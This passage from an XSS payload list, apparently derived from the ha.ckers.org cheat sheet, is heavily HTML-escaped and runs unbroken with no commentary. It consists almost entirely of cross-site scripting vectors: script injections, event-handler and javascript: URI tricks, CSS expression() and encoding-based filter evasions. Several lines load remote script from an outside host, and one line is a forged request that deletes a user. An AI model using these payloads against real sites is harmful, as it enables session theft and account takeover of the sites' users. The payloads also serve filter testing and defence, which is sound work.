worldss\\\&quot;)&lt;/script&gt;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FORID:9#510\\r\\n&lt;script&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/script&gt;&amp;search=1\\r\\n0&amp;q=\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert%2?8String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode?(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83)%?29//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT&gt;&amp;submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;hellox worldss\\\&#039;)&gt;\\r\\n&lt;input onfocus=write(XSS) autofocus&gt;\\r\\n&lt;input onblur=write(XSS) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body onscroll=alert(XSS)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:alert(XSS)\\\&quot;&gt;lol\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;![&gt;&lt;img src=\\\&quot;]&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;&lt;script&gt;alert(123)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n&lt;script&gt;({0:#0=alert/#0#/#0#(0)})&lt;/script&gt;\\r\\n&lt;svg xmlns=\\\&quot;http://www.w3.org/2000/svg\\\&quot;&gt;LOL&lt;script&gt;alert(123)&lt;/script&gt;&lt;/svg&gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert(/XSS/&amp;#46;source)&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\\\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;);&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;INPUT TYPE=\\\\\\\&quot;IMAGE\\\\\\\&quot; SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG DYNSRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG LOWSRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BGSOUND SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BR SIZE=\\\\\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LAYER SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/LAYER&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@import\\\&#039;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Link\\\\\\\&quot; Content=\\\\\\\&quot;&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;BODY{-moz-binding&amp;#58;url(\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;behavior&amp;#58; url(xss&amp;#46;htc);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS\\r\\n&amp;lt;IMG SRC=\\\&#039;vbscript&amp;#058;msgbox(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;mocha&amp;#58;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;livescript&amp;#058;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\nžscriptualert(EXSSE)ž/scriptu\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;\\r\\n&amp;lt;IFRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;\\r\\n&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;\\r\\n&amp;lt;TABLE BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58;\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028&amp;#46;1027\\\\0058&amp;#46;1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;width&amp;#58; expression(alert(\\\&#039;XSS\\\&#039;));\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript&amp;#58;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG STYLE=\\\\\\\&quot;xss&amp;#58;expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;xss&amp;#58;expression(alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\nexp/*&amp;lt;A STYLE=\\\&#039;no\\\\xss&amp;#58;noxss(\\\\\\\&quot;*//*\\\\\\\&quot;);\\r\\nxss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(\\\\\\\&quot;XSS\\\\\\\&quot;))\\\&#039;&amp;gt;\\r\\n&amp;lt;STYLE TYPE=\\\\\\\&quot;text/javascript\\\\\\\&quot;&amp;gt;alert(\\\&#039;XSS\\\&#039;);&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;\\r\\n&amp;lt;STYLE type=\\\\\\\&quot;text/css\\\\\\\&quot;&amp;gt;BODY{background&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert(\\\&#039;XSS\\\&#039;);&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt;\\r\\n&amp;lt;BASE HREF=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);//\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;OBJECT TYPE=\\\\\\\&quot;text/x-scriptlet\\\\\\\&quot; DATA=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\&quot; type=\\\\\\\&quot;image/svg+xml\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\na=\\\\\\\&quot;get\\\\\\\&quot;;\\r\\nb=\\\\\\\&quot;URL(\\\\\\\\\\\&quot;\\\\\\\&quot;;\\r\\nc=\\\\\\\&quot;javascript&amp;#058;\\\\\\\&quot;;\\r\\nd=\\\\\\\&quot;alert(\\\&#039;XSS\\\&#039;);\\\\\\\\\\\&quot;)\\\\\\\&quot;;\\r\\neval(a+b+c+d);\\r\\n&amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\\\\\\\&quot;xss\\\\\\\&quot; implementation=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\\\\\\\&quot;&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;#93;&amp;#93;&amp;gt;\\r\\n&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML ID=\\\\\\\&quot;xss\\\\\\\&quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=\\\\\\\&quot;#xss\\\\\\\&quot; DATAFLD=\\\\\\\&quot;B\\\\\\\&quot; DATAFORMATAS=\\\\\\\&quot;HTML\\\\\\\&quot;&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML SRC=\\\\\\\&quot;xsstest&amp;#46;xml\\\\\\\&quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;\\r\\n&amp;lt;?xml&amp;#58;namespace prefix=\\\\\\\&quot;t\\\\\\\&quot; ns=\\\\\\\&quot;urn&amp;#58;schemas-microsoft-com&amp;#58;time\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;?import namespace=\\\\\\\&quot;t\\\\\\\&quot; implementation=\\\\\\\&quot;#default#time2\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;t&amp;#58;set attributeName=\\\\\\\&quot;innerHTML\\\\\\\&quot; to=\\\\\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;&amp;lt;SCR\\\&#039;\\\\\\\&quot;--&amp;gt;&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\\&#039;\\\\\\\&quot;--&amp;gt;\\r\\n&amp;lt;? echo(\\\&#039;&amp;lt;SCR)\\\&#039;;\\r\\necho(\\\&#039;IPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;lt;/SCRIPT&amp;gt;\\\&#039;); ?&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\\\\\\\&quot;&amp;gt;\\r\\nRedirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&amp;deleteuser\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Set-Cookie\\\\\\\&quot; Content=\\\\\\\&quot;USERID=&amp;lt;SCRIPT&amp;gt;alert(\\\&#039;XSS\\\&#039;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;CONTENT-TYPE\\\\\\\&quot; CONTENT=\\\\\\\&quot;text/html; charset=UTF-7\\\\\\\&quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(\\\&#039;XSS\\\&#039;);+ADw-/SCRIPT+AD4-\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT =\\\\\\\&quot;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\\\\\&quot; \\\&#039;\\\&#039; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT \\\\\\\&quot;a=\\\&#039;&amp;gt;\\\&#039;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=`&amp;gt;` SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\&#039;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;document&amp;#46;write(\\\\\\\&quot;&amp;lt;SCRI\\\\\\\&quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//66&amp;#46;102&amp;#46;7&amp;#46;147/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//1113982867/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//0x42&amp;#46;0x0000066&amp;#46;0x7&amp;#46;0x93/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//0102&amp;#46;0146&amp;#46;0007&amp;#46;00000223/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;htt p&amp;#58;//6 6&amp;#46;000146&amp;#46;0x7&amp;#46;147/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;//www&amp;#46;google&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;//google\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org@google\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//google&amp;#58;ha&amp;#46;ckers&amp;#46;org\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//google&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//www&amp;#46;google&amp;#46;com&amp;#46;/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;javascript&amp;#058;document&amp;#46;location=\\\&#039;http&amp;#58;//www&amp;#46;google&amp;#46;com/\\\&#039;\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//www&amp;#46;gohttp&amp;#58;//www&amp;#46;google&amp;#46;com/ogle&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;\\r\\n%3C\\r\\n&amp;lt\\r\\n&amp;lt;\\r\\n&amp;LT\\r\\n&amp;LT;\\r\\n&amp;#60\\r\\n&amp;#060\\r\\n&amp;#0060\\r\\n&amp;#00060\\r\\n&amp;#000060\\r\\n&amp;#0000060\\r\\n&amp;lt;\\r\\n&amp;#x3c\\r\\n&amp;#x03c\\r\\n&amp;#x003c\\r\\n&amp;#x0003c\\r\\n&amp;#x00003c\\r\\n&amp;#x000003c\\r\\n&amp;#x3c;\\r\\n&amp;#x03c;\\r\\n&amp;#x003c;\\r\\n&amp;#x0003c;\\r\\n&amp;#x00003c;\\r\\n&amp;#x000003c;\\r\\n&amp;#X3c\\r\\n&amp;#X03c\\r\\n&amp;#X003c\\r\\n&amp;#X0003c\\r\\n&amp;#X00003c\\r\\n&amp;#X000003c\\r\\n&amp;#X3c;\\r\\n&amp;#X03c;\\r\\n&amp;#X003c;\\r\\n&amp;#X0003c;\\r\\n&amp;#X00003c;\\r\\n&amp;#X000003c;\\r\\n&amp;#x3C\\r\\n&amp;#x03C\\r\\n&amp;#x003C\\r\\n&amp;#x0003C\\r\\n&amp;#x00003C\\r\\n&amp;#x000003C\\r\\n&amp;#x3C;\\r\\n&amp;#x03C;\\r\\n&amp;#x003C;\\r\\n&amp;#x0003C;\\r\\n&amp;#x00003C;\\r\\n&amp;#x000003C;\\r\\n&amp;#X3C\\r\\n&amp;#X03C\\r\\n&amp;#X003C\\r\\n&amp;#X0003C\\r\\n&amp;#X00003C\\r\\n&amp;#X000003C\\r\\n&amp;#X3C;\\r\\n&amp;#X03C;\\r\\n&amp;#X003C;\\r\\n&amp;#X0003C;\\r\\n&amp;#X00003C;\\r\\n&amp;#X000003C;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\\u003c\\r\\n\\\\u003C\\r\\n&amp;lt;iframe src=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;\\r\\n&amp;lt;SCRIPT SRC=//ha&amp;#46;ckers&amp;#46;org/&amp;#46;js&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js?&amp;lt;B&amp;gt;\\r\\n&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT/SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;BODY onload!#$%&amp;()*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\\\\&amp;#93;^`=alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;gt;\\r\\n&amp;lt;SCRIPT/XSS SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot; javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&amp;lt;SCR\\\\0IPT&amp;gt;alert(\\\\\\\\\\\&quot;XSS\\\\\\\\\\\&quot;)&amp;lt;/SCR\\\\0IPT&amp;gt;\\\\\\\&quot;;\\\&#039; &amp;gt; out\\r\\nperl -e \\\&#039;print \\\\\\\&quot;&amp;lt;IMG SRC=java\\\\0script&amp;#058;alert(\\\\\\\\\\\&quot;XSS\\\\\\\\\\\&quot;)&amp;gt;\\\\\\\&quot;;\\\&#039; &amp;gt; out\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0D;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x0A;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;jav&amp;#x09;ascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(String&amp;#46;fromCharCode(88,83,83))&amp;gt;\\r\\n&amp;lt;IMG 